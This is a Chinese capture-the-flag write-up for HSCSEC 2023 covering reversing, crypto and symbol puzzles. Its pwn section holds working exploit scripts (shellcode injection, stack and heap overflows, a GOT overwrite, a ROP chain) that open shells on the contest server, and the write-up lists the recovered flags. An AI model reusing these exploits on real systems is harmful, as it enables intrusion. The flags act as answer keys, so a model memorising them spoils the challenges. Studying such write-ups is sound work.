[HSCSEC 2023] rev,pwn,crypto,Ancient-MISC部分
2024-06-15 06:19:01
比赛后有讲解,没赶上,前20比赛完1小时提交WP,谁会大半夜的起来写WP。
总的感觉pwn,crypto过于简单,rev有2个难的不会,其它不是我的方向都感觉过于难,一个都没作。
rev
DECOMPILEONEOONE
入门题,一个简单的运算
v6[0] = 0x5C797E8971697066LL;v6[1] = 0x8D83497D7F6F7A3DLL;v6[2] = 0x949DA8758277A9A5LL;v7 = 0xB7954D7C;*(_QWORD *)s = 0LL;v9 = 0LL;v10 = 0LL;v11 = 0LL;v12 = 0LL;v13 = 0LL;v14 = 0LL;v15 = 0LL;v16 = 0LL;v17 = 0LL;v18 = 0LL;v19 = 0LL;v20 = 0;puts("give me your flag:");__isoc99_scanf("%s", s);if ( strlen(s) == 28 ){for ( i = 0; i <= 27; ++i ){s[i] += 3 * i + 1;s[i] ^= (_BYTE)i + 1;if ( (i & 1) != 0 )v4 = s[i] - i - 1;elsev4 = s[i] - i;s[i] = v4;if ( s[i] != *((_BYTE *)v6 + i) ){puts("that's a fake flag!\n");return 0;}}puts("congratulations!");return 0;}换成python
from pwn import p64v6 = p64(0x5C797E8971697066) + p64(0x8D83497D7F6F7A3D) + p64(0x949DA8758277A9A5) + p64(0xB7954D7C)for i in range(28):for s in range(0x20,0x7f):v = sv+=3*i+1v^= i+1v-=i + (i&1) if v == v6[i]:print(chr(s), end='')#flag{reV3rSe_1s_sucH_hanD1e}Whack-a-mole
这个有些难,到最后也没找到运算的逻辑。
先运行程序,是个windows窗口,里边有flag估计是点上就输出。但是点不上。
这是个啥也的程序不清楚,首先先找到入口。WinMain调用窗口执行pfnSubclass
int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{unsigned int v4; // eaxWNDCLASSW WndClass; // [esp+10h] [ebp-48h] BYREFstruct tagMSG Msg; // [esp+38h] [ebp-20h] BYREFv4 = time64(0);srand(v4);WndClass.style = 0;WndClass.hIcon = 0;*(_QWORD *)&WndClass.cbClsExtra = 0i64;WndClass.lpszMenuName = 0;WndClass.lpszClassName = L"revme";WndClass.hInstance = hInstance;WndClass.hbrBackground = GetSysColorBrush(15);WndClass.lpfnWndProc = sub_401200;WndClass.hCursor = LoadCursorW(0, (LPCWSTR)0x7F00);RegisterClassW(&WndClass);CreateWindowExW(0, WndClass.lpszClassName, L"revme", 0x10CF0000u, 150, 150, 400, 300, 0, 0, hInstance, 0);SetWindowSubclass(hWnd, pfnSubclass, 0x190u, 0);while ( GetMessageW(&Msg, 0, 0, 0) ){TranslateMessage(&Msg);DispatchMessageW(&Msg);}return Msg.wParam;
}在pfnSubclass里有个判断0x200,这里是按钮跳的控制。
RESULT __stdcall pfnSubclass(HWND hWnd,UINT uMsg,WPARAM wParam,LPARAM lParam,UINT_PTR uIdSubclass,DWORD_PTR dwRefData)
{int v6; // ediint v7; // eaxif ( uMsg == 512 ){v6 = rand() % 150 + 50;v7 = rand();SetWindowPos(::hWnd, 0, v6, v7 % 150 + 50, 80, 25, 0);}return DefSubclassProc(hWnd, uMsg, wParam, lParam);
}把这里的判断改掉让他不跳,点中后报错
"Oops,no flag...plz look carefully:("拿到这个报错找到处理逻辑
LRESULT __stdcall sub_401200(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
{HWND v4; // ebxLPARAM v5; // edi_DWORD *v6; // ebxchar *v7; // ecxchar *v8; // ediint v9; // eax_BYTE *v10; // esiint v11; // ecx_BYTE *v12; // ecxint v13; // edx_DWORD *v14; // ecxint v15; // ebxint v16; // edxchar v17; // albool v18; // zfchar *v19; // eax_DWORD *v20; // edichar *v21; // ebxint v22; // edxint v23; // esiint v24; // ecxchar *v25; // esiint v26; // edichar *v27; // esiFILE *v28; // eaxFILE *v29; // ediLONG WindowLongW; // eaxint v32; // [esp+Ch] [ebp-10h]int v33; // [esp+Ch] [ebp-10h]char *v34; // [esp+10h] [ebp-Ch]char *v35; // [esp+14h] [ebp-8h]const char *v36; // [esp+18h] [ebp-4h]v4 = hWnd;v5 = lParam;if ( Msg == 1 ){::hWnd = CreateWindowExW(0, L"Button", L"flag", 0x50000000u, 85, 150, 80, 25, hWnd, (HMENU)3, 0, 0);CreateWindowExW(0, L"Button", L"give up", 0x50000000u, 185, 150, 80, 25, hWnd, (HMENU)2, 0, 0);CreateWindowExW(0, L"Static", (LPCWSTR)"t", 0x50000000u, 85, 100, 300, 20, hWnd, (HMENU)1, 0, 0);WindowLongW = GetWindowLongW(hWnd, -16);SetWindowLongW(hWnd, -16, WindowLongW & 0xFFFEFFFF);return DefWindowProcW(v4, Msg, wParam, v5);}if ( Msg == 2 )goto LABEL_23;if ( Msg != 273 )return DefWindowProcW(v4, Msg, wParam, v5);if ( (unsigned __int16)wParam == 2 ){
LABEL_23:PostQuitMessage(0);return DefWindowProcW(v4, Msg, wParam, v5);}if ( (unsigned __int16)wParam == 3 ){if ( lParam == 3301 ){v6 = &unk_405390;v36 = "7dnaicms7skf0ws2t";v7 = "7skf0ws2t";v34 = (char *)&unk_405390;v35 = "7skf0ws2t";v8 = byte_403170;v32 = 9;do{v9 = *(_DWORD *)v7;v10 = v6;v6[1] = *((_DWORD *)v7 + 1);v11 = 8;*v6 = v9;do{*v10 = byte_403170[(unsigned __int8)*v10];++v10;--v11;}while ( v11 );sub_401110(v6);v12 = v6;v13 = 8;do{*v12++ ^= *v8++;--v13;}while ( v13 );v14 = v6;v15 = v36 - (const char *)v6;v16 = 8;do{v17 = *((_BYTE *)v14 + v15);v14 = (_DWORD *)((char *)v14 + 1);*((_BYTE *)v14 - 1) ^= v17;--v16;}while ( v16 );v18 = v32-- == 1;v7 = v34;v19 = v35;v35 = v34;v6 = v10;v36 = v19;v34 = v10;}while ( !v18 );v20 = &unk_405390;v33 = 4;v21 = (char *)&unk_4053D0;do{v18 = v33-- == 1;v20 += 2;v22 = *(v20 - 2);v21 -= 8;v23 = *(v20 - 1);v24 = *((_DWORD *)v21 + 3);*(v20 - 2) = *((_DWORD *)v21 + 2);*(v20 - 1) = v24;*((_DWORD *)v21 + 2) = v22;*((_DWORD *)v21 + 3) = v23;}while ( !v18 );v25 = (char *)&unk_405398;v26 = 7;do{sub_401110(v25);v25 += 8;--v26;}while ( v26 );sub_401050(&Source);sub_401050(&unk_405020);v27 = (char *)malloc(0x10u);strncpy(v27, &Source, 0x10u);MessageBoxW(hWnd, L"flag already saved to aaa.txt", L"GOOD JOB!!", 0);v28 = fopen("aaa.txt", L"w");v29 = v28;if ( !v28 ){MessageBoxW(hWnd, L"open file error", L"Error", 0);free(v27);exit(-1);}fwrite(v27, 1u, 0x10u, v28);fclose(v29);free(v27);v4 = hWnd;v5 = 3301;}else{MessageBoxW(hWnd, L"Oops,no flag...plz look carefully:(", L"Error", 0);}}return DefWindowProcW(v4, Msg, wParam, v5);
}这里边有两个判断
第1个是49行的msg !=273 退出
第2个是59行的lParam == 3301 进入写flag
所以在这里patch一下程序,这里的200改为111
.text:004014C3 81 7D 0C 00 02 00 00 cmp [ebp+uMsg], 200h这里 74 (jz)改为75 (jnz) 让if反转
.text:0040124D 74 18 jz short loc_401267然后运行程序会写flag.txt文件,不过这题有点特殊其它的都是用HSCSEC壳,这个用flag
w1n32_aPi_iS_FUn
flag{w1n32_aPi_iS_FUn}Base secrets
估计又是C++啥的程序写的,变量巨长,视觉上增加难度。
void __noreturn base64::main::h8d09d41539d521ef()
{int v0; // eax_str v1; // raxcore::result::Result<usize,std::io::error::Error> v2; // [esp+0h] [ebp-D0h]___str_ v3; // [esp+4h] [ebp-CCh]___str_ v4; // [esp+4h] [ebp-CCh]___str_ v5; // [esp+4h] [ebp-CCh]__core::fmt::ArgumentV1_ v6; // [esp+Ch] [ebp-C4h]__core::fmt::ArgumentV1_ v7; // [esp+Ch] [ebp-C4h]__core::fmt::ArgumentV1_ v8; // [esp+Ch] [ebp-C4h]core::fmt::Arguments v9; // [esp+3Ch] [ebp-94h] BYREF__core::fmt::ArgumentV1_ args; // [esp+54h] [ebp-7Ch] BYREFalloc::string::String inputstr; // [esp+5Ch] [ebp-74h] BYREF_str secret; // [esp+68h] [ebp-68h] BYREFchar v13; // [esp+70h] [ebp-60h] BYREFint v14; // [esp+78h] [ebp-58h]alloc::string::String tstr; // [esp+7Ch] [ebp-54h] BYREFcore::fmt::Arguments v16; // [esp+88h] [ebp-48h] BYREFcore::fmt::ArgumentV1 v17; // [esp+A0h] [ebp-30h] BYREFcore::fmt::Arguments v18; // [esp+A8h] [ebp-28h] BYREFcore::fmt::ArgumentV1 v19; // [esp+C0h] [ebp-10h] BYREFargs = (__core::fmt::ArgumentV1_)core::fmt::ArgumentV1::new_display::h1ad73d91458110e6((_str *)&x);v3.data_ptr = (_str *)&pieces;v3.length = 2;v6.data_ptr = (core::fmt::ArgumentV1 *)&args;v6.length = 1;core::fmt::Arguments::new_v1::h798f53dc69339845(&v9, v3, v6);std::io::stdio::_print::hf063fbe3e71516fe();alloc::string::String::new::h007ebff4f83ba4cc(&inputstr);secret.data_ptr = (u8 *)"hexZh3tyVXM3X2AwX35yM+IxRU1nkz5nmWdzhXdF7Qo= 1K";// base64的密文44字节secret.length = 44;std::io::stdio::stdin::h732159ffb928152a();v14 = v0;std::io::stdio::Stdin::read_line::h5c0cf1c7e8922086();*(_DWORD *)v2.gap0 = &v13;*(_DWORD *)&v2.gap0[4] = 4928728;core::result::Result$LT$T$C$E$GT$::unwrap::h5a9311bcc8369470(v2);v1 = _$LT$alloc..string..String$u20$as$u20$core..ops..deref..Deref$GT$::deref::h5b5b76767b35bbdc(&inputstr);base64::base64_encode::h366e735ee236a687(&tstr, v1);// base64编码if ( !_$LT$alloc..string..String$u20$as$u20$core..cmp..PartialEq$LT$$RF$str$GT$$GT$::eq::h68fb5c598021c6a9(&tstr,&secret) ){v19 = core::fmt::ArgumentV1::new_display::h1ad73d91458110e6((_str *)&off_4B3540);v8.data_ptr = &v19;v8.length = 1;v5.length = 2;v5.data_ptr = (_str *)&pieces;core::fmt::Arguments::new_v1::h798f53dc69339845(&v18, v5, v8);std::io::stdio::_print::hf063fbe3e71516fe();std::process::exit::h86e1d779ebfe0c3e();}v17 = core::fmt::ArgumentV1::new_display::h1ad73d91458110e6((_str *)&off_4B350C);v7.data_ptr = &v17;v7.length = 1;v4.length = 2;v4.data_ptr = (_str *)&pieces;core::fmt::Arguments::new_v1::h798f53dc69339845(&v16, v4, v7);std::io::stdio::_print::hf063fbe3e71516fe();std::process::exit::h86e1d779ebfe0c3e();
}主程序里看到两个东西:
secret.data_ptr = (u8 *)"hexZh3tyVXM3X2AwX35yM+IxRU1nkz5nmWdzhXdF7Qo= 1K";这个应该是密文
base64::base64_encode::h366e735ee236a687(&tstr, v1);// base64编码这个写着是base64估计就大概是base64变表,进到里边发现几个查表语句
memcpy(v37, &::self, sizeof(v37)); // &::self 码表然后点到::self看下码表,果然是变表。
code = '456789+-IJKLMNOPQRSTUVWXghijklmnYZabcdefopqrstuvwxyz0123ABCDEFGH='
b64code = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='
c = "hexZh3tyVXM3X2AwX35yM+IxRU1nkz5nmWdzhXdF7Qo=" # ' 1K'
from base64 import *m = ''.join(b64code[code.index(v)] for v in c)
print(b64decode(m))
#flag{rUs7_n0_pr0b1EM_s0_yisey}后边两个都无从下手,等官方的WP,官方说有。都一天了,估计还在写。
PWN
EZPWN
入门题,main调用了hacker,在hacker里调用mprotect将内存修改为可写可执行。然后有个写溢出
int __cdecl main(int argc, const char **argv, const char **envp)
{hacker();return 0;
}
__int64 hacker()
{char buf[256]; // [rsp+0h] [rbp-110h] BYREFvoid *addr; // [rsp+100h] [rbp-10h]int v3; // [rsp+10Ch] [rbp-4h]v3 = getpagesize();addr = (void *)((unsigned __int64)buf2 & 0xFFFFFFFFFFFFF000LL);mprotect((void *)((unsigned __int64)buf2 & 0xFFFFFFFFFFFFF000LL), v3, 7);puts("input:");read(0, buf, 0x200uLL);strncpy(buf2, buf, 0x64uLL);printf("bye bye ~");return 0LL;
}先把shellcode放在前边,后边利用溢出作个跳转。
from pwn import *p = remote('43.143.254.94', 10176)
#p = process('EZPWN')context(arch='amd64', log_level='debug')pay = asm(shellcraft.amd64.linux.sh()).ljust(0x110, b'\x90')+ flat(0x404800, 0x404080) #p.sendlineafter(b"input:", pay)
p.sendline(pay)p.interactive()#HSCSEC{71d13c5a-5102-4944-aa5c-7e6f23c264fd}Morris II
有菜单但不是菜单题,程序很长长长长。硬着头皮看。
int __cdecl select_main()
{int iselect; // [rsp+Ch] [rbp-4h] BYREFputs(a0GoOut);printf(aChooseAnAction);__isoc99_scanf(&unk_402103, &iselect); // %dwhile ( 1 ){switch ( iselect ){case 0:find_enemies(); // confirm_input(); 有溢出,溢出到后门break;case 1:dined();break;case 2:shop(); // shopbreak;case 3:work(); // 随机-degree +coinbreak;case 4:attribute(); // 显示break;default:continue;}}
}
void __cdecl fight_system()
{unsigned int v0; // eaxint select; // [rsp+1Ch] [rbp-14h] BYREFint Player_fight; // [rsp+20h] [rbp-10h]int s; // [rsp+24h] [rbp-Ch]int w; // [rsp+28h] [rbp-8h]int Enemies_blood; // [rsp+2Ch] [rbp-4h]v0 = time(0LL);srand(v0);w = rand() % 3;s = rand() % 10;Player_fight = player_fight;Enemies_blood = enemies_blood[s];puts("\n******************************entered battle mode***************************************");printf(format, (unsigned int)player_blood);while ( player_blood > 0 && Enemies_blood > 0 && player_degree_of_hunger > 30 ){confirm_input(); // 有溢出
......
}
int __cdecl confirm_input()
{char hero_name[16]; // [rsp+0h] [rbp-10h] BYREFputs("\ntype yor hero's name!:");read(0, hero_name, 0x64uLL);puts("confirmed.");return 0;
}
int __cdecl dontlookatme()
{system("/bin/sh");return 0;
}发现第1个菜单处有溢出,而且有后门函数,这就简单了。其实有溢出,有没有后门都好办。
from pwn import *#p = process('Morris_II')
p = remote('43.143.254.94', 10365)context(arch='amd64', log_level= 'debug')p.sendlineafter(b'choose an action from below\xef\xbc\x9a', b'0')
#ret + dontlookatme()
p.sendlineafter(b"type yor hero's name!:\n", b'\x00'*0x18 + flat(0x401d04, 0x401236))p.interactive()
#HSCSEC{48cc6864-8ab7-48a5-9075-92b09a69bb3e}EasyHeap
回到菜单题了。很标准的菜单,在free没有清指针有UAF,并且有后门。
void __cdecl __noreturn main(int a1)
{int v1; // [esp+0h] [ebp-14h]char s[4]; // [esp+4h] [ebp-10h] BYREFunsigned int v3; // [esp+8h] [ebp-Ch]int *v4; // [esp+Ch] [ebp-8h]v4 = &a1;v3 = __readgsdword(0x14u);setvbuf(stdout, 0, 2, 0);setvbuf(stdin, 0, 2, 0);while ( 1 ){while ( 1 ){sub_80495E8();memset(s, 0, sizeof(s));read(0, s, 4u);v1 = atoi(s);if ( v1 != 1 )break;m1_add();}if ( v1 == 2 ){m2_free(); // UAF}else if ( v1 == 3 ){m3_show();}else{if ( v1 == 4 )exit(-1);puts("Invalid option.");}}
}
unsigned int m2_free()
{unsigned int result; // eaxint v1; // [esp+4h] [ebp-14h]char buf[4]; // [esp+8h] [ebp-10h] BYREFunsigned int v3; // [esp+Ch] [ebp-Ch]v3 = __readgsdword(0x14u);printf("Note id: ");read(0, buf, 4u);v1 = atoi(buf);if ( v1 < 0 || v1 >= dword_804C060 ){puts("Invalid id!");_exit(-1);}if ( dword_804C04C[v1] ){free(*(void **)(dword_804C04C[v1] + 4));free((void *)dword_804C04C[v1]); //没有清指针puts("Deleted!");}result = v3 - __readgsdword(0x14u);if ( result )sub_8049790();return result;
}块包含管理块和数据块,管理块有调用puts的函数指针和指向数据块的指针。
先建两个比8大的块,两个管理块是8,free后再建大小为8的块,这样数据块会使用0块的管理块,达到写管理块指针的目的。由于这里有后门,直接写后门就行。不然还有一点小麻烦,因为指针是自己还不是+4,所以这个还需要绕过。
from pwn import *#p = process('./easyHeap')
p = remote('43.143.254.94', 10044)context(arch='i386', log_level='debug')
def add(size,msg):p.sendlineafter(b"Input Option: ", b'1')p.sendlineafter(b"Size: ", str(size).encode())p.sendafter(b"Content: ", msg)def free(idx):p.sendlineafter(b"Input Option: ", b'2')p.sendlineafter(b"Note id: ", str(idx).encode())def show(idx):p.sendlineafter(b"Input Option: ", b'3')p.sendlineafter(b"Note id: ", str(idx).encode())add(0x10,b'A') #0
add(0x20,b'A') #1
free(0)
free(1)
add(0x8, flat(0x80495bd)) #到后门 system('cat /flag')show(0)
p.interactive()
Dead Star Weapon Management System
这名字为什么起了这么长。
第2个菜单题,漏洞在edit这里修改的长度多了1
unsigned __int64 m3_change()
{unsigned int v0; // eaxsigned int v1; // ebxchar buf[4]; // [rsp+4h] [rbp-14h] BYREFunsigned __int64 v4; // [rsp+8h] [rbp-10h]v4 = __readfsqword(0x28u);puts("weapon index:");read(0, buf, 4uLL);v0 = strtol(buf, 0LL, 10);if ( v0 > 4 ){puts("[!]index malform.");_exit(0);}v1 = v0;if ( *(&ptr + (int)v0) ){puts("your additional info:");read_n(*((void **)*(&ptr + v1) + 1), *(_QWORD *)*(&ptr + v1) + 1LL);// 参2长度,溢出puts("weapon changed.");}else{puts("[!]weapon not found.!");}return __readfsqword(0x28u) ^ v4;
}块结构跟上一题类似,管理块有size和ptr指向数据块
在edit里会允许多写1字节。通过这个溢出可以修改下一块的长度,改大,当下一块free后会再建会形成重叠,达到修改指针目的。
先造一个这样的结构,
先建0x18的0和1,将1free在得到两个20的fastbin,再建0x28的1,2让1,2的头连在一起,这里利用漏洞修改head1的大小,然后将1释放,释放的块包含块2的头,再建1,大小为0x38的块就能用后部覆盖2块的头。
将2的头ptr改为指向got表,show(2)得到libc地址,再将got.free改为指向system
from pwn import *#p = process('./deathstar_admin')
p = remote('43.143.254.94', 10689)elf = ELF('./deathstar_admin')
libc = ELF('/home/kali/glibc/libs/2.23-0ubuntu10-amd64/libc6_2.23-0ubuntu10_amd64.so')context(arch='amd64', log_level='debug')def add(size,msg):p.sendlineafter(b"[?]choose an action:\n" ,b'1')p.sendlineafter(b"weapon length:\n", str(size).encode())p.sendafter(b"weapon detail:\n", msg)def show(idx):p.sendlineafter(b"[?]choose an action:\n" ,b'2')p.sendlineafter(b"weapon index:\n", str(idx).encode())def edit(idx, msg):p.sendlineafter(b"[?]choose an action:\n" ,b'3')p.sendlineafter(b"weapon index:\n", str(idx).encode())p.sendafter(b"your additional info:\n", msg) #off_by_onedef free(idx):p.sendlineafter(b"[?]choose an action:\n" ,b'4')p.sendlineafter(b"weapon index:\n", str(idx).encode())add(0x18,b'A')
add(0x18,b'A') #1
free(1)
add(0x28,b'B') #1
add(0x28,b'C') #2 save
edit(0, b'A'*(0x18+1)) #size改为 0x41
free(1)
add(0x38, b'/bin/sh\x00'+b'A'*0x10 + flat(0x21, 8, elf.got['free'])) #1head+2head
show(2)
p.recvuntil(b'info:')libc.address = u64(p.recvline()[:-1].ljust(8, b'\x00')) - libc.sym['free']
print('libc:', hex(libc.address))edit(2, p64(libc.sym['system']))
free(1)
p.interactive()
#HSCSEC{4bf9597e-e58b-4485-99f9-71d05c0f5d8a}Safe Program
最后一个pwn,感觉这题个头太小。
__int64 __fastcall main(int a1, char **a2, char **a3)
{__int64 v4[9]; // [rsp+0h] [rbp-50h] BYREF__int16 v5; // [rsp+48h] [rbp-8h]char v6; // [rsp+4Ah] [rbp-6h]setvbuf(stdin, 0LL, 2, 0LL);setvbuf(stdout, 0LL, 2, 0LL);setvbuf(stderr, 0LL, 2, 0LL);memset(v4, 0, sizeof(v4));v5 = 0;v6 = 0;puts("i am a simple repeater with no way to exploit.\n");puts("you can talk to me now:\n");sub_4011D6(v4);return 0LL;
}
ssize_t __fastcall sub_4011D6(void *a1)
{char buf[127]; // [rsp+10h] [rbp-80h] BYREFchar v3; // [rsp+8Fh] [rbp-1h]sleep(3u);v3 = 0;setbuf(stdin, buf);memcpy(a1, buf, v3);return read(0, buf, 0x16DuLL);
}就是一个溢出,别的什么都没有。
from pwn import *#p = process('./Safe_Program')
p = remote('43.143.254.94', 10972)context(arch='amd64', log_level= 'debug')
elf = ELF('./Safe_Program')
libc = ELF('/home/kali/glibc/libs/2.31-0ubuntu9.9_amd64/libc-2.31.so')pop_rdi = 0x0000000000401393 # pop rdi ; ret
bss = 0x404800sleep(3)
p.sendafter(b"you can talk to me now:\n\n", flat(b'\x00'*0x80,bss, pop_rdi, elf.got['puts'], elf.plt['puts'], 0x4011d6))libc.address = u64(p.recvline()[:-1].ljust(8, b'\x00')) - libc.sym['puts']p.send(flat(b'\x00'*0x80,bss, pop_rdi+1, pop_rdi, next(libc.search(b'/bin/sh\x00')), libc.sym['system'], 0x4011d6))p.interactive()Ancient-MISC
两个MISC其实都不会,赛后看了群里说的WP,感觉有点意思,在这里存一下。
Deduced gossip
第一题是八卦,但群里说是九宫八卦,脑子没转到那。这是洛书九宫与八卦的对应图
这样把给的东西转码就是9进制(1转为0,... 9转成8)
原题
☲☵ ☷☵☳ ☶空 ☷☵☳ ☶☱ ☶空 ☷空☱ ☶空 ☷☳☰ ☷☳☱ ☷☴☳ ☷☳☳ ☷☴☶ ☷☳☳ ☷☷☰ ☷☳空 ☰☴ ☷☴☶ ☷☴☶ ☷☴空 ☷空☲转码程序,刚开始不知道对应关系,用flag头猜的,最后乾和巽猜一下也行。
def k9(n):k=''while n>0:k=str(n%9)+k n//=9return k for v in b'HSCSEC{}':print(str(k9(v)), end=',')
#80,102,74,102,76,74,146,148,a = "80,102,74,102,76,74,146,74,125,126,132,122,137,122,115,124,53,137,137,134,148"
print(''.join([chr(int(v,9)) for v in a.split(',')]))
#HSCSEC{Chinese_g0ssp}
#HSCSEC{Chinese_g0ssip} 提交加iWatch the sky at night
第二个以为是28进制,怎么也没转出来。后来WP说是4进制,恍然大悟。东西南北四方七宿各为一个数字就成了4进制,4个正好是一个字符。
斗木獬角木蛟奎木狼亢金龙 牛金牛女土蝠氐土貉井木犴
虚日鼠房日兔心月狐鬼金羊 危月燕室火猪尾火虎柳土獐
壁水貐箕水豹斗木獬牛金牛 女土蝠角木蛟亢金龙星日马
虚日鼠张月鹿娄金狗翼火蛇 危月燕氐土貉房日兔轸水蚓
室火猪心月狐井木犴胃土雉 壁水貐斗木獬鬼金羊柳土獐
牛金牛尾火虎箕水豹女土蝠 虚日鼠昴日鸡柳土獐毕月乌
危月燕觜火猴角木蛟星日马 室火猪参水猿奎木狼壁水貐
斗木獬娄金狗牛金牛女土蝠 虚日鼠胃土雉张月鹿昴日鸡
危月燕翼火蛇室火猪亢金龙 壁水貐斗木獬轸水蚓井木犴
牛金牛氐土貉房日兔女土蝠 虚日鼠危月燕心月狐尾火虎
室火猪鬼金羊柳土獐壁水貐今天这是咋了,写一点菜单就没了。发布好几次。4个符号对应哪个数字再爆破。通过头也可以定。
a = '''
斗木獬角木蛟奎木狼亢金龙 牛金牛女土蝠氐土貉井木犴
虚日鼠房日兔心月狐鬼金羊 危月燕室火猪尾火虎柳土獐
壁水貐箕水豹斗木獬牛金牛 女土蝠角木蛟亢金龙星日马
虚日鼠张月鹿娄金狗翼火蛇 危月燕氐土貉房日兔轸水蚓
室火猪心月狐井木犴胃土雉 壁水貐斗木獬鬼金羊柳土獐
牛金牛尾火虎箕水豹女土蝠 虚日鼠昴日鸡柳土獐毕月乌
危月燕觜火猴角木蛟星日马 室火猪参水猿奎木狼壁水貐
斗木獬娄金狗牛金牛女土蝠 虚日鼠胃土雉张月鹿昴日鸡
危月燕翼火蛇室火猪亢金龙 壁水貐斗木獬轸水蚓井木犴
牛金牛氐土貉房日兔女土蝠 虚日鼠危月燕心月狐尾火虎
室火猪鬼金羊柳土獐壁水貐'''
#应为 壁水獝
dic = {
'E':['角木蛟','亢金龙','氐土貉','房日兔','心月狐','尾火虎','箕水豹'],
'S':['井木犴','鬼金羊','柳土獐','星日马','张月鹿','翼火蛇','轸水蚓'],
'W':['奎木狼','娄金狗','胃土雉','昴日鸡','毕月乌','觜火猴','参水猿'],
'N':['斗木獬','牛金牛','女土蝠','虚日鼠','危月燕','室火猪','壁水貐']}f = ''
a = a.replace('\r\n','').replace(' ','').replace('\n','')
for i in range(0,len(a),3):v = a[i:i+3]for j in dic:if v in dic[j]:f+=jfrom itertools import permutations
num = '0123'
for v in permutations(num,4):tmp = f.replace('N',v[0]).replace('S',v[1]).replace('W',v[2]).replace('E',v[3])flag = ''.join([chr(int(tmp[m:m+4], 4)) for m in range(0,len(tmp),4)])if 'HSCSEC{' in flag:print(flag)
#HSCSEC{CN_Ancient_AP} Crypto
EZRSA
这个就都比较简单了。
from flag import mp = getPrime(1024)
q = getPrime(1024)
n = p * q
print('n =',n)
e = 0x10001
M = m * e * 1 * 2022 * p
c = pow(M,e,n)
print('c =',c)
显然M有因子p,n也有 c = M^e - kn 所以c 也有,gcd(c,n)就能得到p,由于m一般很小m*2022*e*p不会大于n,所以后边就直接除。
from Crypto.Util.number import *
from math import gcd
import gmpy2e = 0x10001
n = 16266043783454053154037197753138388613864200794483663334493856481522764684650995230938142916968470804276539967429581472897698022852787399956166067156691430593337430691851251036378709799238876668312530223697905925939542713491015517460139150765778057817475571231361809654951289718071760502692960235551663466242938669673675870151921605230499603814070711617511206013584605131901906195136038060653121164252894949526861390984185085201067988694831398388037080993820517447099157891181179389949333832439004857436617834100885739716577641892686620423154860716308518151628754780994043553863224363539879909831811888663875989774849
c = 12716190507848578560760116589677996073721225715245215495257947887969923319693501568134141757778665747980229898129090929698368855086594836111461700857934476682700625486249555753323344759513528101651108919161794915999809784961533946922607642974500946026677116418317599095703217004064379100607278317877894742815660315660254853364776654303066021672567442581774299847661025422994141801987588151758971034155714424052693627277202951522779716696303237915400201362585413354036973117149974017434406560929491956957193491445847385625481870256240443170803497196783872213746269940877814806857222191433079944785910813364137603874411
p = gcd(c,n)
q = n//p
d = gmpy2.invert(e, (p-1)*(q-1))M = pow(c,d,n)m = M//2022//e//pflag = long_to_bytes(m)
print(flag)
#flag{3e5e2789a93a80615cc35edbff397c05}
#HSCSEC{3e5e2789a93a80615cc35edbff397c05} Operator
这题没弄清楚出题是什么意思,就是个除法,直接除
#!/bin/python3
from Crypto.Util.number import bytes_to_long, getPrimeFLAG = "*******************MASK****************"# print(FLAG)
number1 = getPrime(512)
number2 = getPrime(1024)
print(number1)
result = FLAG * number1 % number2
print(result)
Output:
n1 = 11488359375916816818731868252559119400126174593041608170883818546254791846479664455120194350355087017477744828351806157930199157462913063513512421460678471
res = 1890846045246997191702622225497063073251667816125412875121879991742654650976309481716690792328873189601779812108551290078049710826355501933349874438201643986975141068179879506727213209273645848165732801667704040761771bytes.fromhex(hex(res//n1)[2:])
#flag{qMmZqWvmj70bBsCfmVLT}
#HSCSEC{qMmZqWvmj70bBsCfmVLT}EZVC
感觉回到逆向了。明显都是逆向的内容。正好晚上打算睡觉的时候上的新题,直接弄个一血,然后睡个好觉。
import flag
alphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!"#$%&\'()*+,-./:;<=>?@[\]^_`{|}~'
key = 'HSC'
assert flag.startswith('HSCSEC{')
flag_num_list = []
c = []
for item in flag:flag_num_list.append(alphabet.find(item) + 1)
key_num = alphabet.find(key) + 1 #0
for i in flag_num_list:m = (i + key_num) % 94 - 1if m == 0:c.append("□") #e2 96 a1 0x25a1c.append(alphabet[m-1:m])
print("c = {}".format(''.join(c)))alphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!"#$%&\'()*+,-./:;<=>?@[\]^_`{|}~'
c = 'GRBRDB`jg10ij2g01i,g201gi,2gi2,012igaigagi|'f1 = [alphabet.find(v)+1 for v in c]
f2 = [v+1-i for i,v in enumerate(f1)]
f3 = [alphabet[v-1] for v in f2]
f4 = [alphabet[(alphabet.find(v)+i)%94] for i,v in enumerate(f3)]
print(''.join(f4))
#HSCSEC{kh21jk3h12j-h312hj-3hj3-123jhbjhbhj}[HSCSEC 2023] rev,pwn,crypto,Ancient-MISC部分相关推荐
- [irisctf 2023] rev
逆向题最多,有7道,只会4个 rev baby_rev 类似于签到的题 s -= 105;v6 = v6 - 114 + 1;v7 = v7 - 105 + 2;v8 = v8 - 115 + 3;v ...
- 常见密码和编码总结 CTF中Crypto和Misc必备
前言 对常见的编码和密码做个归纳 并记录一些可用的网站和工具 可以当做手册使用 一.常见编码 1.ASCII编码 现今最通用的单字节编码系统,并等同于国际标准ISO/IEC 646 可以分作三部分组成 ...
- 2023陕西省赛-Crypto
本人是密码初学者,有错误的地方希望能斧正. 奇怪的sar 解题思路:根据线性同余去求出a,b,继而求出seed import gmpy2 from gmpy2 import * from Crypto ...
- 2023红明谷杯misc方向wp
文章目录 hacker 阿尼亚 X光的秘密 Q:2282679004 流量包其实完全非预期了后面 要是有师傅会的话求求教我一下 hacker 导出http对象 发现有shell.php,分析后大概了解 ...
- [Incognito 4.0] ictf 2023
一周4赛,有点赶不过来呀. 只做了一点,队长组队的时候 (每次都中间断掉,一大堆写的都得从头来) Crypto Ancient 这样的第2次见,第1次就不会,这回看了队友wp终于知道是怎么加密的了 T ...
- 一篇就够 2023网络安全技术自学路线图及职业选择方向
一篇就够 | 2023网络安全技术自学路线图及职业选择方向 每天都有新闻报道描述着新技术对人们的生活和工作方式带来的巨大乃至压倒性影响.与此同时有关网络攻击和数据泄露的头条新闻也是日益频繁. 攻击者可 ...
- 2023 年以太坊生态 5 大预测
原文作者:neworder,由 DeFi 之道 隔夜的粥编译. 我们对以太坊生态系统的五个预测: 熊市还没有过去: EigenLayer 将是以太坊最重要的创新: Blob 交易不会修复可扩展性问题: ...
